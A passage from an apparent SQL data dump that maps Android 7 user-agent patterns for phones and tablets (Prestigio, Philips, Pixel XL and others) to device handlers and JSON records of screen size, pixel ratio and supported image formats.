Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRO 7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRO 7-H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRO 7-S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRO1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRO5548PR010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PRO6048PR001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSP3470DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSP3471DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSP3552DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSP5510DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSP5511DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSP5513DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSP5515DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSP5518DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSP5520DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSP5552DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSP7510DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSP7512DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSP7550DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSP7551DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSP7570DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSP7572DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSPCL20A0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PSPCM20A0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Panasonic P90) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Pass) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Pearl A4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Phantom6-Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Philips S257) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Philips S318) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Philips S327) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Philips S338) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Philips S359) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Philips S369) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Philips S386) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Philips X588) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Philips X818) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Pixel XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Pixus Raze) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Platinum_5.0M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Platinum_A5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Platinum_M5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Plume H1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Plume L1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Plume P8 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Point_X1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Positivo BGH +Simple) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Positivo Slim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Power 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Power 3S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Power Ice Evo) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Power Plus 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Power1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; PowerMaxP600S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Power_2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Power_3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Prime_2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Primo G7+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Primo HM4+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Primo NH3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Pure 1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Pure 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Pure View) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Pure1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Q-Smart_III_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Q10S5IN4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Q8S55IN4G2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Q8S5IN4GP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Q8S6IN4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Q9S5IN4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Q9S5IN4G2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; QPHONE_9.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Q_Smart_BE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Qphone 7.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Quantum Fit) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Quantum You E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; R2 3G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; R2 LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; R2 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; R3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; R6 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; R70) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 